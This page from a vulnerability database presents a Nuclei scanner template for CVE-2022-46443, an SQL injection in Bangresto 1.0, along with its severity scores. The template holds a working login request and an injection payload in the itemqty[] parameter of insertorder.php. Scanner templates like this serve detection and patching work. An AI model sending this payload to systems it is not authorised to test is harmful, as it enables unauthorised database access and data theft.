Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-46443
HistoryJun 29, 2023 - 5:37 p.m.

Bangresto - SQL Injection

2023-06-2917:37:08
ProjectDiscovery
github.com
3
cve2022
bangresto
sqli
bangresto_project
unauthorized
data leakage
compromise

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

9.2

Confidence

High

EPSS

0.054

Percentile

93.3%

Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.
id: CVE-2022-46443

info:
  name: Bangresto - SQL Injection
  author: Harsh
  severity: high
  description: |
    Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and underlying database.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://yuyudhn.github.io/CVE-2022-46443/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46443
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-46443
    cwe-id: CWE-89
    epss-score: 0.05592
    epss-percentile: 0.93248
    cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: bangresto_project
    product: bangresto
  tags: cve,cve2022,bangresto,sqli,bangresto_project
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /bangresto-main/staff/process.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}
      - |
        POST /bangresto-main/staff/insertorder.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;

        itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'
# digest: 490a004630440220546106a7f2e5d87e4644af7e6149e2152ad3ff4bba50bf14273c1d969fcdcbbb0220213a962730e5bed5cbf2cafe4775a0ce842a873bed29946a1e020f5bc86dc748:922c64590222798bb761d5b6d8e72950

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

9.2

Confidence

High

EPSS

0.054

Percentile

93.3%

Related for NUCLEI:CVE-2022-46443